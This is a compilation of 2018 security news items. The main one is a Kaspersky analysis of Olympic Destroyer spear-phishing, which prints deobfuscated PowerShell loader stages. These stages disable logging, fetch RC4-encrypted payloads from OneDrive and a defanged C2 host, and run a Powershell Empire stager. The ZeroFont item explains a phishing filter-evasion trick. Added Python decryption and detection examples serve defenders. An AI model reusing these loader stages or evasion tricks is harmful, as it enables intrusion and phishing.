Flightradar24 (@flightradar24), 4:13 PM - Jun 18, 2018:
Hello, it is legitimate. We have already invalidated your old password and the link in the email will allow you to create a new password. We apologize for any inconvenience this may cause.

A moderator of the Flightradar24.com forum confirmed that no personal and financial information was exposed.

“We can confirm that the email some of our users received in regards to a security breach has been sent by us. The security breach may have compromised the email addresses and hashed passwords for a small subset of Flightradar24 users (those who registered prior to March 16, 2016).

We would like to apologize that this breach occurred and for the inconvenience this may cause. We would also like to stress that we have no indication any of personal information was compromised.” wrote a company spokesman on the official forum.

“The security breach was limited to one server and it was promptly shut down once the intrusion attempt had been ascertained. An email has been sent to users with affected accounts. Please note that no payment information has been compromised. Flightradar24 neither handles nor stores payment information.”


The company added that it has contained the incident: as soon as it discovered that one of its servers had been compromised, it shut the machine down.

The bad news is that the company admitted that the passwords were protected by an old hashing algorithm that would allow attackers to crack the hashes; Flightradar24 only introduced a more secure hashing algorithm in 2016.

At the time it is not clear how many users have been affected; the company reported that the incident involved only a “small subset” of users.

FlightRadar24 claims to have more than 40 million users per month, so even a small subset could amount to a significant number of affected users.



Chronicle launches VirusTotal Monitor to reduce false positives
21.6.2018 securityaffairs  Security

Alphabet-owned cybersecurity firm Chronicle announced the launch of a new VirusTotal service that promises to reduce false positives.
The VirusTotal Monitor service allows developers to upload their application files to a private cloud store, where they are scanned every day using the anti-malware solutions of the antivirus vendors in VirusTotal.

Every time a scan flags a file as malicious, VirusTotal notifies both the antivirus vendor and the developer.

Of course, files analyzed by the VirusTotal Monitor service will remain private and are not shared by the company with third-parties.

The service implements a Google Drive-like interface that lets developers upload their files, and a dashboard that displays the scan results. Both developers and AV companies can access the dashboard, and the service also provides APIs so that developers and antivirus vendors can integrate Monitor with their own tools.

“Enter VirusTotal Monitor. VirusTotal already runs a multi-antivirus service that aggregates the verdicts of over 70 antivirus engines to give users a second opinion about the maliciousness of the files that they check.” reads the announcement published by VirusTotal.

“For antivirus vendors this is a big win, as they can now have context about a file: who is the company behind it? when was it released? in which software suites is it found? What are the main file names with which it is distributed? For software developers it is an equally big win, as they can upload their creations to Monitor at pre-publish stage, to ensure a release without issues.”


VirusTotal pointed out that the Monitor service is not a free pass to get any file whitelisted.

“Sometimes vendors will indeed decide to keep detections for certain software, however, by having contextual information about the author behind a given file, they can prioritize work and take better decisions, hopefully leading to a world with less false positives,” continues the announcement.

“The idea is to have a collection of known source software, then each antivirus can decide what kind of trust-based relationship they have with each software publisher.”

Are you interested in this service? Now you can request a trial period for VirusTotal Monitor.


Olympic Destroyer is still alive
20.6.2018 Kaspersky
Virus

In March 2018 we published our research on Olympic Destroyer, an advanced threat actor that hit organizers, suppliers and partners of the Winter Olympic Games 2018 held in Pyeongchang, South Korea. Olympic Destroyer was a cyber-sabotage attack based on the spread of a destructive network worm. The sabotage stage was preceded by reconnaissance and infiltration into target networks to select the best launchpad for the self-replicating and self-modifying destructive malware.

We have previously emphasized that the story of Olympic Destroyer is different to that of other threat actors because the whole attack was a masterful operation in deception. Despite that, the attackers made serious mistakes, which helped us to spot and prove the forgery of rare attribution artefacts. The attackers behind Olympic Destroyer forged automatically generated signatures, known as Rich Header, to make it look like the malware was produced by Lazarus APT, an actor widely believed to be associated with North Korea. If this is new to the reader, we recommend a separate blog dedicated to the analysis of this forgery.

The deceptive behavior of Olympic Destroyer, and its excessive use of various false flags, which tricked many researchers in the infosecurity industry, got our attention. Based on malware similarity, the Olympic Destroyer malware was linked by other researchers to three Chinese speaking APT actors and the allegedly North Korean Lazarus APT; some code had hints of the EternalRomance exploit, while other code was similar to the Netya (Expetr/NotPetya) and BadRabbit targeted ransomware. Kaspersky Lab managed to find lateral movement tools and initial infection backdoors, and has followed the infrastructure used to control Olympic Destroyer in one of its South Korean victims.

Some of the TTPs and operational security used by Olympic Destroyer bear a certain resemblance to Sofacy APT group activity. When it comes to false flags, mimicking TTPs is much harder than tampering with technical artefacts. It implies a deep knowledge of how the actor being mimicked operates as well as operational adaptation to these new TTPs. However, it is important to remember that Olympic Destroyer can be considered a master in the use of false flags: for now we assess that connection with low to moderate confidence.

We decided to keep tracking the group and set our virtual ‘nets’ to catch Olympic Destroyer again if it showed up with a similar arsenal. To our surprise it has recently resurfaced with new activity.

In May-June 2018 we discovered new spear-phishing documents that closely resembled weaponized documents used by Olympic Destroyer in the past. This and other TTPs led us to believe that we were looking at the same actor again. However, this time the attacker has new targets. According to our telemetry and the characteristics of the analyzed spear-phishing documents, we believe the attackers behind Olympic Destroyer are now targeting financial organizations in Russia, and biological and chemical threat prevention laboratories in Europe and Ukraine. They continue to use a non-binary executable infection vector and obfuscated scripts to evade detection.

Simplified infection procedure

Infection Analysis
In reality the infection procedure is a bit more complex and relies on multiple different technologies, mixing VBA code, Powershell, MS HTA, with JScript inside and more Powershell. Let’s take a look at this more closely to let incident responders and security researchers recognize such an attack at any time in the future.

One of the recent documents that we discovered had the following properties:

MD5: 0e7b32d23fbd6d62a593c234bafa2311
SHA1: ff59cb2b4a198d1e6438e020bb11602bd7d2510d
File Type: Microsoft Office Word
Last saved date: 2018-05-14 15:32:17 (GMT)
Known file name: Spiez CONVERGENCE.doc

The embedded macro is heavily obfuscated. It has randomly generated variable and function names.

Obfuscated VBA macro

Its purpose is to execute a Powershell command. This VBA code was obfuscated with the same technique used in the original Olympic Destroyer spear-phishing campaign.

It starts a new obfuscated Powershell scriptlet via the command line. The obfuscator uses array-based rearranging to mutate the original code and protects all commands and strings, such as the command and control (C2) server address.

There is one known obfuscation tool used to produce such an effect: Invoke-Obfuscation.

Obfuscated commandline Powershell scriptlet

This script disables Powershell script logging to avoid leaving traces:

IF(${GPc}[ScriptBlockLogging])
{
${Gpc}[ScriptBlockLogging][EnableScriptBlockLogging]=0;
${gpc}[ScriptBlockLogging][EnableScriptBlockInvocationLogging]=0
}
It has an inline implementation of the RC4 routine in Powershell, which is used to decrypt an additional payload downloaded from Microsoft OneDrive. The decryption relies on a hardcoded 32-byte ASCII hexadecimal alphabet key. This is a familiar technique used in other Olympic Destroyer spear-phishing documents in the past and in Powershell backdoors found in the infrastructure of Olympic Destroyer’s victims located in Pyeongchang.

${k}= ( .VARiabLE Bqvm ).vAlUE::"aSCiI".GETBYtes.Invoke(d209233c7d7d7acee5aa0e8b0889bb1e);
${R}={
${D},${K}=${aRGS};
${s}=0..255;0..255^|^&('%'){
${J}=(${j}+${S}[${_}]+${K}[${_}%${k}."coUNt"])%256;
${S}[${_}],${S}[${j}]=${S}[${J}],${S}[${_}]
};
${d}^|^&('%'){
${i}=(${i}+1)%256;
${h}=(${h}+${s}[${I}])%256;
${S}[${i}],${S}[${h}]=${s}[${h}],${s}[${I}];
${_}-Bxor${S}[(${S}[${I}]+${s}[${h}])%256]
}};
${daTa}=${wc}.DOWNloADDatA.Invoke(https://api.onedrive[.]com/v1.0/shares/s!ArI-XSG7nP5zbTpZANb3-dz_oU8/driveitem/content);
${IV}=${dATa}[0..3];
${dATa}=${dATA}[4..${dAta}."LENgtH"];
-JoIn[CHar[]](^& ${r} ${daTa} (${iV}+${k}))
The second stage payload downloaded is an HTA file that also executes a Powershell script.

Downloaded access.log.txt

This file has a similar structure to the Powershell script executed by the macro in spear-phishing attachments. After deobfuscating it, we can see that this script also disables Powershell logging and downloads the next stage payload from the same server address. It also uses RC4 with a pre-defined key:

${k}= ( Get-vaRiablE R4Imz -VAl )::"aSCIi".GEtBytEs.Invoke(d209233c7d7d7acee5aa0e8b0889bb1e);
${r}={${D},${K}=${ARGs};
${s}=0..255;
0..255^|.('%'){${j}=(${j}+${S}[${_}]+${k}[${_}%${K}."COUNT"])%256;
${S}[${_}],${s}[${J}]=${s}[${j}],${s}[${_}]};
${d}^|.('%'){${I}=(${I}+1)%256;
${h}=(${h}+${S}[${I}])%256;
${s}[${I}],${S}[${H}]=${s}[${h}],${s}[${i}];
${_}-BxOR${s}[(${s}[${i}]+${S}[${h}])%256]}};
${wC}."HeaDErS".Add.Invoke(Cookie,session=B43mgpQ4No69GDp3PmklQpTZB5Q=);
${SeR}=https://mysent[.]org:443;
${t}=/modules/admin.php;
${dATA}=${wc}.DOWNLOAdDaTA.Invoke(${SeR}+${t});
${iV}=${DATA}[0..3];
${DATA}=${dATA}[4..${dAta}."LeNGTh"];
-JoiN[ChAR[]](^& ${R} ${daTa} (${IV}+${k}))
The final payload is the Powershell Empire agent. Below we partially provide the http stager scriptlet for the downloaded Empire agent.

$wc.HeAders.Add("User-Agent",$UA);
$raw = $wc.UploadData($s + "/modules/admin.php","POST",$rc4p2);
Invoke-Expression $($e.GetSTRiNG($(DecrYPT-BYtEs -KeY $kEy -In $raW)));
$AES = $NuLl;

[GC]::COLLEcT();
Invoke-Empire -Servers @(($s -split "/")[0..2] -join "/") -StagingKey $SK -SessionKey $key -SessionID $ID -WorkingHours "WORKING_HOURS_REPLACE" -KillDate "REPLACE_KILLDATE" -ProxySettings $Script:Proxy; }
Powershell Empire is a free and open-source post-exploitation framework written in Python and Powershell that allows fileless control of compromised hosts, has a modular architecture and relies on encrypted communication. This framework is widely used by penetration-testing companies in legitimate security tests for lateral movement and information gathering.
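The RC4 routine in both scriptlets above (the macro stage and the access.log.txt stage) uses one payload layout: the first four downloaded bytes are an IV, and the RC4 key is that IV followed by the ASCII bytes of the hardcoded 32-character hex string. The following Python is an added example for incident responders, not Kaspersky's code: it reimplements that scheme so a captured stage can be decrypted and sanity-checked offline; the hex key and the sample stage are constructed placeholders, not values from the campaign.

```python
import os
from typing import Optional

# Constructed stand-in for the 32-character hex key the scriptlets hardcode;
# an analyst would substitute the key recovered from the deobfuscated script.
EXAMPLE_HEX_KEY = "00112233445566778899aabbccddeeff"


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4, the routine the scriptlets carry inline: key-scheduling
    swaps driven by key[i % len(key)], then a keystream XOR over the data."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


def stage_key(iv: bytes, hex_key: str) -> bytes:
    """${iV}+${k} in the scriptlet: the 4 IV bytes followed by the ASCII bytes
    of the hex string (32 bytes), giving a 36-byte RC4 key."""
    if len(iv) != 4:
        raise ValueError("IV must be exactly 4 bytes")
    return iv + hex_key.encode("ascii")


def decrypt_stage(blob: bytes, hex_key: str) -> bytes:
    """Decrypt a downloaded stage: blob[0..3] is the IV, blob[4..] the ciphertext."""
    if len(blob) < 5:
        raise ValueError("blob too short to hold an IV and ciphertext")
    return rc4(stage_key(blob[:4], hex_key), blob[4:])


def encrypt_stage(plaintext: bytes, hex_key: str, iv: Optional[bytes] = None) -> bytes:
    """Inverse of decrypt_stage (RC4 is symmetric); used here to build test vectors."""
    iv = os.urandom(4) if iv is None else iv
    return iv + rc4(stage_key(iv, hex_key), plaintext)


def looks_like_script(data: bytes, threshold: float = 0.95) -> bool:
    """Cheap check for a trial key: a recovered HTA/PowerShell stage is almost
    entirely printable ASCII, while a wrong key yields byte soup."""
    if not data:
        return False
    printable = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return printable / len(data) >= threshold


if __name__ == "__main__":
    # Constructed stage standing in for the real second-stage HTA.
    stage = b"<html><body>constructed second-stage placeholder</body></html>"
    blob = encrypt_stage(stage, EXAMPLE_HEX_KEY, iv=b"\x01\x02\x03\x04")
    recovered = decrypt_stage(blob, EXAMPLE_HEX_KEY)
    print(recovered == stage, looks_like_script(recovered))
```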

Infrastructure
We believe that the attackers used compromised legitimate web servers for hosting and controlling malware. Based on our analysis, the URI paths of the discovered C2 servers included the following:

/components/com_tags/views
/components/com_tags/views/admin
/components/com_tags/controllers
/components/com_finder/helpers
/components/com_finder/views/
/components/com_j2xml/
/components/com_contact/controllers/
These are known directory structures used by a popular open source content management system, Joomla:

Joomla components path on Github

Unfortunately we don’t know what exact vulnerability was exploited in the Joomla CMS. What is known is that one of the payload hosting servers used Joomla v1.7.3, which is an extremely old version of this software, released in November 2011.

A compromised server using Joomla

Victims and Targets
Based on several target profiles and limited victim reports, we believe that the recent operation by Olympic Destroyer targets Russia, Ukraine and several other European countries. According to our telemetry, several victims are entities from the financial sector in Russia. In addition, almost all the samples we found were uploaded to a multi-scanner service from European countries such as the Netherlands, Germany and France, as well as from Ukraine and Russia.

Location of targets in recent Olympic Destroyer attacks

Since our visibility is limited, we can only speculate about the potential targets based on the profiles suggested by the content of selected decoy documents, email subjects or even file names picked by the attackers.

One such decoy document grabbed our attention. It referred to ‘Spiez Convergence’, a bio-chemical threat research conference held in Switzerland, organized by SPIEZ LABORATORY, which not long ago was involved in the Salisbury attack investigation.

Decoy document using Spiez Convergence topic

Another decoy document observed in the attacks (‘Investigation_file.doc’) references the nerve agent used to poison Sergey Skripal and his daughter in Salisbury:

Some other spear-phishing documents include words in the Russian and German language in their names:

9bc365a16c63f25dfddcbe11da042974 Korporativ.doc
da93e6651c5ba3e3e96f4ae2dd763d94 Korporativ_2018.doc
e2e102291d259f054625cc85318b7ef5 E-Mail-Adressliste_2018.doc
One of the documents included a lure image with perfect Russian language in it.

A message in Russian encouraging the user to enable macro (54b06b05b6b92a8f2ff02fdf47baad0e)

One of the most recent weaponized documents was uploaded to a malware scanning service from Ukraine in a file named ‘nakaz.zip’, containing ‘nakaz.doc’ (translated as ‘order.doc’ from Ukrainian).

Another lure message to encourage the user to enable macro

According to metadata, the document was edited on June 14th. The Cyrillic messages inside this and previous documents are in perfect Russian, suggesting that it was probably prepared with the help of a native speaker and not automated translation software.

Once the user enables macro, a decoy document is displayed, taken very recently from a Ukrainian state organization (the date inside indicates 11 June 2018). The text of the document is identical to the one on the official website of the Ukrainian Ministry of Health.

Decoy document inside nakaz.doc

Further analysis of other related files suggests that the target of this document works in the biological and epizootic threat prevention field.

Attribution
Although not comprehensive, the following findings can serve as a hint to those looking for a better connection between this campaign and previous Olympic Destroyer activity. More information on overlaps and reliable tracking of Olympic Destroyer attacks is available to subscribers of Kaspersky Intelligence Reporting Services (see below).

Similar obfuscated macro structure

The documents above show apparent structural similarity as if they were produced by the same tool and obfuscator. The highlighted function name in the new wave of attacks isn’t in fact new. While being uncommon, a function named “MultiPage1_Layout” was also found in the Olympic Destroyer spear phishing document (MD5: 5ba7ec869c7157efc1e52f5157705867).

Same MultiPage1_Layout function name used in older campaign

Conclusions
Despite initial expectations for it to stay low or even disappear, Olympic Destroyer has resurfaced with new attacks in Europe, Russia and Ukraine. In late 2017, a similar reconnaissance stage preceded a larger cyber-sabotage stage meant to destroy and paralyze infrastructure of the Winter Olympic Games as well as related supply chains, partners and even venues at the event location. It’s possible that in this case we have observed a reconnaissance stage that will be followed by a wave of destructive attacks with new motives. That is why it is important for all bio-chemical threat prevention and research companies and organizations in Europe to strengthen their security and run unscheduled security audits.

The variety of financial and non-financial targets could indicate that the same malware was used by several groups with different interests – i.e. a group primarily interested in financial gain through cybertheft and another group or groups looking for espionage targets. This could also be a result of cyberattack outsourcing, which is not uncommon among nation state actors. On the other hand, the financial targets might be another false flag operation by an actor who has already excelled at this during the Pyeongchang Olympics to redirect researchers’ attention.

Certain conclusions could be made based on motives and the selection of targets in this campaign. However, it is easy to make a mistake when trying to answer the question of who is behind this campaign with only the fragments of the picture that are visible to researchers. The appearance, at the start of this year, of Olympic Destroyer with its sophisticated deception efforts, changed the attribution game forever. We believe that it is no longer possible to draw conclusions based on few attribution vectors discovered during regular investigation. The resistance to and deterrence of threats such as Olympic Destroyer should be based on cooperation between the private sector and governments across national borders. Unfortunately, the current geopolitical situation in the world only boosts the global segmentation of the internet and introduces many obstacles for researchers and investigators. This will encourage APT attackers to continue marching into the protected networks of foreign governments and commercial companies.

The best thing we can do as researchers is to keep tracking threats like this. We will keep monitoring Olympic Destroyer and report on new discovered activities of this group.

More details about Olympic Destroyer and related activity are available to subscribers of Kaspersky Intelligence Reporting services. Contact: intelreports@kaspersky.com

Indicators Of Compromise
File Hashes

Domains and IPs


New VirusTotal Service Aims to Reduce False Positives
20.6.2018 securityweek Security

VirusTotal, which recently became part of Alphabet’s new cybersecurity company Chronicle, announced on Tuesday the launch of a new service designed to help software developers and security vendors reduce the number of false positive detections.

VirusTotal Monitor is a premium service that allows software developers to upload their application files to a private cloud store where they are scanned every day by the products of the more than 70 antivirus vendors in VirusTotal.

If a file is flagged as malicious, both the developer and the antivirus vendor are automatically notified.

Developers can upload their files using an interface similar to Google Drive, and both developers and AV companies are provided a dashboard where they can view results. In addition to the web interface, both parties can leverage APIs to integrate Monitor with their own tools.


“For antivirus vendors this is a big win, as they can now have context about a file: who is the company behind it? when was it released? in which software suites is it found? What are the main file names with which it is distributed?” explained VirusTotal’s Emiliano Martinez. “For software developers it is an equally big win, as they can upload their creations to Monitor at pre-publish stage, to ensure a release without issues.”

VirusTotal highlighted that the uploaded files will not be shared with third-parties, except for the antivirus vendors, which will get access to the files their products detect.

While it may seem that Monitor opens a door to abuse, VirusTotal pointed out that the new service is “not a free pass to get any file whitelisted.”

“Sometimes vendors will indeed decide to keep detections for certain software, however, by having contextual information about the author behind a given file, they can prioritize work and take better decisions, hopefully leading to a world with less false positives,” Martinez said. “The idea is to have a collection of known source software, then each antivirus can decide what kind of trust-based relationship they have with each software publisher.”

VirusTotal Monitor has been in pre-release testing and is now accepting its first users. Developers can request a trial period.


Phishers Use 'ZeroFont' Technique to Bypass Office 365 Protections
20.6.2018 securityweek Phishing

Cybercriminals have been leveraging a technique that involves manipulating font sizes in an effort to increase the chances of their phishing emails bypassing the protections implemented by Microsoft in Office 365.

According to cloud security company Avanan, one of the phishing protections in Office 365 involves natural language processing in order to identify text typically used in fraudulent or malicious emails.

For instance, researchers say the system flags emails mentioning “Apple” or “Microsoft” but not coming from legitimate domains, or messages referencing user accounts, password resets or financial requests.

In recent attacks spotted by Avanan, cybercriminals sent out phishing emails in which some of the content is set to be displayed with zero-size font using <span style="FONT-SIZE: 0px">. The security firm has dubbed this technique ZeroFont.

The email looks normal to the user, but Microsoft’s filters read the entire text, even if it’s displayed with a font size of “0”. The user sees this:

ZeroFont phishing email

But Microsoft’s systems will analyze the following text, which includes strings that are invisible to the user due to the "FONT-SIZE: 0px" attribute:

ZeroFont phishing email

“Microsoft can not identify this as a spoofing email because it cannot see the word ‘Microsoft’ in the un-emulated version. Essentially, the ZeroFont attack makes it possible to display one message to the anti-phishing filters and another to the end user,” Avanan’s Yoav Nathaniel said in a blog post.
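A defender-side check for the ZeroFont trick, as an added example (not code from Avanan or Microsoft): it splits an HTML body into what the recipient sees and what a filter reading the raw text sees, then reports keywords that appear only in the rendered view. The sample message, the keyword list and all function names are constructed for this illustration.

```python
"""Detect ZeroFont-style text hiding: content styled with font-size:0 is invisible to
the reader but still present in the raw text a naive filter scans. Inline styles
only; CSS classes and <style> blocks are not evaluated here."""
from html.parser import HTMLParser
import re

# Matches a zero font size in an inline style ("FONT-SIZE: 0px", "font-size:0"),
# but not non-zero sizes such as "0.5em" or "10px".
ZERO_FONT_RE = re.compile(
    r"font-size\s*:\s*0+(?:\.0+)?\s*(?:px|pt|em|rem|%)?(?=\s*(?:;|!|$))", re.I)

# Void elements never get an end tag, so they must not touch the visibility stack.
VOID_TAGS = {"area", "base", "br", "col", "embed", "hr", "img", "input",
             "link", "meta", "source", "track", "wbr"}

# Illustrative keyword list modelled on what the article says the filter looks for
# (brand names, accounts, password resets); not Microsoft's actual rule set.
KEYWORDS = ("microsoft", "apple", "password", "account")


class ZeroFontExtractor(HTMLParser):
    """Split an HTML body into text the user sees and text hidden by font-size:0."""

    def __init__(self):
        super().__init__()
        self.visible, self.hidden, self.raw = [], [], []
        self._hidden_stack = []   # one flag per open element: is its text hidden?
        self._skip_depth = 0      # inside <style>/<script>: not message text at all

    def _currently_hidden(self):
        return self._hidden_stack[-1] if self._hidden_stack else False

    def handle_starttag(self, tag, attrs):
        if tag in VOID_TAGS:
            return
        if tag in ("style", "script"):
            self._skip_depth += 1
        style = dict(attrs).get("style") or ""
        # A child of a hidden element stays hidden whatever its own style says.
        self._hidden_stack.append(
            self._currently_hidden() or bool(ZERO_FONT_RE.search(style)))

    def handle_endtag(self, tag):
        if tag in VOID_TAGS:
            return
        if tag in ("style", "script") and self._skip_depth:
            self._skip_depth -= 1
        if self._hidden_stack:
            self._hidden_stack.pop()

    def handle_data(self, data):
        if self._skip_depth:
            return
        self.raw.append(data)
        (self.hidden if self._currently_hidden() else self.visible).append(data)


def _normalize(parts):
    # Join adjacent text nodes with no separator so "Mi" + "cro" + "soft" reads as one word.
    return " ".join("".join(parts).split())


def analyze(html):
    """Return what the user sees, what was hidden, and which keywords a raw-text filter misses."""
    parser = ZeroFontExtractor()
    parser.feed(html)
    parser.close()
    visible, hidden, raw = (_normalize(parser.visible), _normalize(parser.hidden),
                            _normalize(parser.raw))
    seen_by_user = {k for k in KEYWORDS if k in visible.lower()}
    seen_by_raw_filter = {k for k in KEYWORDS if k in raw.lower()}
    return {
        "visible_text": visible,
        "hidden_text": hidden,
        "zero_font_present": bool(hidden),
        # Keywords the recipient reads but a filter scanning the raw text would not find.
        "evaded_keywords": sorted(seen_by_user - seen_by_raw_filter),
    }


# Constructed sample in the style the article describes: junk characters in zero-size
# spans break the keywords for the filter while the reader still sees whole words.
SAMPLE_EMAIL = """<html><body>
<p>Dear user,</p>
<p>Your Mi<span style="FONT-SIZE: 0px">ab</span>cro<span style="FONT-SIZE: 0px">xy</span>soft
acc<span style="font-size:0">q</span>ount pass<span style="FONT-SIZE: 0px">..</span>word expires today.</p>
<p style="font-size: 0.5em">Sent by the support team.</p>
<p>Click <a href="https://example.invalid/login">here</a> to keep access.</p>
</body></html>"""

if __name__ == "__main__":
    report = analyze(SAMPLE_EMAIL)
    print("user sees :", report["visible_text"])
    print("hidden    :", report["hidden_text"])
    print("evaded    :", report["evaded_keywords"])
```

The practical takeaway is to run keyword and brand checks on the rendered (visible) text, and to treat any zero-size inline font as a strong signal on its own.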

Last month, Avanan reported that cybercriminals had been splitting malicious URLs in an effort to bypass the Safe Links security feature in Office 365.


CrowdStrike Raises $200 Million at $3 Billion Valuation
20.6.2018 securityweek IT

Sunnyvale, California-based endpoint security firm CrowdStrike today announced that it has secured over $200 million through a Series E round of financing, valuing the company north of $3 billion.

Founded in 2011, CrowdStrike takes a cloud-based approach to endpoint security and has more than doubled both its revenue and headcount over the past year. The company says it is currently serving more than 16% of Fortune 1000 companies and 20% of Fortune 500 companies.

According to the company, the newly secured funds will be used to accelerate the global demand for its CrowdStrike Falcon endpoint protection platform.

The company also says it has seen impressive year-over-year growth in various areas, including: 500% increase in number of $1 million or greater annual contract value (ACV) transactions, 167% increase in the number of subscription customers, 172% growth in new subscription bookings ACV, and 140% increase in annual recurring revenue.

In early June, the company launched its next-generation endpoint security breach prevention warranty, offering up to $1 million if a breach occurs within a customer’s protected environment, as part of its Falcon EPP Complete offering.

In July 2017, CrowdStrike teamed with Dragos, a company that specializes in protecting industrial control systems (ICS), on a strategic partnership to allow joint customers to benefit from a combination of CrowdStrike’s assessment, preparedness and incident response services and Dragos’ expertise in protecting ICS.

The Series E funding round was led by General Atlantic, Accel and IVP, with participation from March Capital and CapitalG.


Cylance Announces $120 Million in Funding
20.6.2018 securityweek IT

Endpoint security firm Cylance announced Tuesday afternoon that it has closed a $120 million funding round led by funds managed by Blackstone Tactical Opportunities and including other investors.

The announcement was made hours after endpoint security rival CrowdStrike announced that it had raised more than $200 million in a Series E round of funding at a $3 billion valuation. Given the timing of the announcement—just after 1PM ET—it is likely that Cylance had been preparing to announce its funding in the near future, but scrambled to get the news out as soon as possible to follow CrowdStrike. The company did not immediately respond to a request for comment on the timing of the announcement.

Cylance’s flagship endpoint security product, CylancePROTECT, takes a mathematical and machine learning approach to identifying and containing zero day and advanced attacks. The company has been utilizing artificial intelligence and machine learning as part of its core marketing message since the company was founded in 2012.

The company claims that it has prevented over 23 million attacks worldwide, including more than four million previously unidentified attacks.

According to Cylance, the additional cash will be used to support sales, marketing and development efforts to increase market share, and further expand its footprint across Europe, the Middle East, and Asia Pacific, and expand product offerings.

“With annual revenues over $130 million for fiscal year 2018, over 90% year-over-year growth, and more than 4,000 customers, including over 20% of the Fortune 500, we have demonstrated market success, scale and traction,” said Brian Robins, Chief Financial Officer at Cylance. “We are honored to have Blackstone Tactical Opportunities expand its commitment to Cylance by leading this round of financing. The investment supports our growth strategy and will enable us to continue on the path to becoming cash flow positive.”

In April 2017, Ars Technica published an article detailing a test that used 48 Cylance-provided malware samples, which showed 100% detection by Cylance but somewhat less from competing products, leading to suggestions that Cylance had been gaming the system. In response, Chad Skipper, Cylance's vice president of product testing and industry relations, explained that Cylance doesn't simply use known malware for tests, but alters the samples via the mpress and vmprotect packers so they effectively become unknown malware. Cylance also claimed at the time that the majority of independent third-party tests are biased in favor of the incumbent vendors that use malware signature databases (as well as other techniques, including their own use of machine learning).

Cylance is not alone in disputes over competitive testing methods. CrowdStrike sued testing firm NSS Labs in 2017 to seek a temporary restraining order to prevent publication of CrowdStrike comparative test results. CrowdStrike explained that it filed suit to hold NSS accountable for unlawfully accessing its software, breaching its contract, pirating its software, and improper security testing.


China-Linked 'Thrip' Spies Target Satellite, Defense Companies
20.6.2018 securityweek BigBrothers

A China-linked cyber espionage group has breached the systems of satellite operators, telecommunications companies and defense contractors in the United States and Southeast Asia, Symantec reported on Tuesday.

Symantec has been tracking the threat actor, which it has named “Thrip,” since 2013. However, the security firm says the group’s activities have not been made public until now.

Thrip has used a combination of custom malware and legitimate tools in its attacks. One victim was a satellite communications operator, where the hackers targeted devices involved in operations, as well as systems running software designed for monitoring and controlling satellites.

“This suggests to us that Thrip’s motives go beyond spying and may also include disruption,” Symantec researchers said.

Thrip has also targeted a company specializing in geospatial imaging and mapping. The attackers attempted to gain access to machines hosting MapXtreme GIS, Google Earth Server and Garmin imaging software.

The list of victims identified by Symantec also includes three telecoms firms in Southeast Asia. The companies themselves appear to have been Thrip’s targets rather than their customers. Another victim is a defense contractor, but no details have been shared by the security firm on this attack.

Symantec has been monitoring Thrip since 2013, when it spotted a campaign conducted from systems located in China. The group initially relied mostly on custom malware, but more recent campaigns, which started last year, also involved legitimate tools.

The pieces of malware used by the group include Trojan.Rikamanu, a trojan designed for stealing credentials and other information from compromised systems, and Infostealer.Catchamas, an evolution of Rikamanu that includes improved data theft and anti-detection capabilities.

Thrip has also been spotted using Trojan.Mycicil, a keylogger offered on Chinese underground marketplaces but which has not been seen often, and Backdoor.Spedear and Trojan.Syndicasec, both of which have been observed in the group’s older campaigns.

As for the legitimate tools used by the cyberspies, the list includes the Windows SysInternals utility PSExec, PowerShell, the post-exploitation tool Mimikatz, the open source FTP client WinSCP, and the LogMeIn remote access software.

“This is likely espionage,” said Greg Clark, CEO of Symantec. “The Thrip group has been working since 2013 and their latest campaign uses standard operating system tools, so targeted organizations won’t notice their presence. They operate very quietly, blending in to networks, and are only discovered using artificial intelligence that can identify and flag their movements. Alarmingly, the group seems keenly interested in telecom, satellite operators, and defense companies. We stand ready to work with appropriate authorities to address this serious threat.”


Does Cryptocurrency Encourage Crime?
20.6.2018 securityaffairs Cryptocurrency

Is cryptocurrency making some wrongdoings harder to commit while making others more rampant in society? Does Cryptocurrency Encourage Crime?
People hear a lot about how cryptocurrency — and particularly the blockchain technology associated with it — could decrease some kinds of crime because it’s so transparent and all transactions become part of an unchangeable record.

However, is cryptocurrency making some wrongdoings harder to commit while making others more rampant in society?

Cybersecurity Firm Says Cryptocurrency Causes Raised Ransom Demands
A cybersecurity firm in the United Kingdom called MWR InfoSecurity believes the increasing demand in the cryptocurrency market contributes to more depth and liquidity. So, people who buy and sell cryptocurrency assets can more easily move enormous amounts of the virtual currency without causing dramatic price fluctuations in those assets.

Representatives of MWR InfoSecurity argue that those conditions make cybercriminals feel emboldened when making larger than usual ransom requests from their victims. They often request cryptocurrency instead of traditional money, and it’s becoming easier for them to up the amounts they demand.

Although cryptocurrency doesn’t necessarily facilitate crimes in these cases, it could urge the criminals to be more devastating to their targets.

Cryptocurrency Connected to Crime Increase in India
The Indian government does not recognize cryptocurrency as legal tender, and it banned banks from providing services to companies that buy and sell virtual currency. That latter decision caused some cryptocurrency exchanges to shut down.

India is not a welcoming country for cryptocurrency users, and that’s likely because when cryptocurrency began taking off in the country, related crimes rose too.

Some of them focused on duping hopeful investors who wanted to get rich with cryptocurrency. Others include crimes connected to malware on cryptocurrency mining machines. Fake cryptocurrency apps and unscrupulous companies appeared as well.

In the majority of cases, criminals likely noticed opportunities because people got excited about a technology about which they knew little.

The perpetrators cashed in on ignorance and often succeeded because their victims were so eager to get involved in cryptocurrency that they took leaps without first getting sufficiently educated.

Criminals commonly prey on people who are desperate, and that’s why the cryptocurrency market is ripe for their misdeeds.

Many individuals view the cryptocurrency market as one filled with promise. Moreover, they read the stories of people who are now millionaires after becoming early cryptocurrency investors. So, some people are more likely than not to get ahead of themselves and become involved in cryptocurrency scams due to not performing adequate research.

Most Online Crimes Involve Cryptocurrency — but Not Always Anonymity
According to some estimates, as much as 99 percent of unlawful online activities have an element of cryptocurrency. Plus, although people on the blockchain can see cryptocurrencies going into various wallets, criminals know it’s not likely law enforcement agencies will link their identities to the wallets.

That lack of identifying information allows them to sell content snatched during data breaches and feel less afraid that they’ll get found out compared to if they were trying to profit from their crimes without the cloak of cryptocurrency.

Further statistics from a recent research paper found that approximately 25 percent of all Bitcoin users have ties to illegal activities and that 44 percent of Bitcoin transactions were connected to crimes.

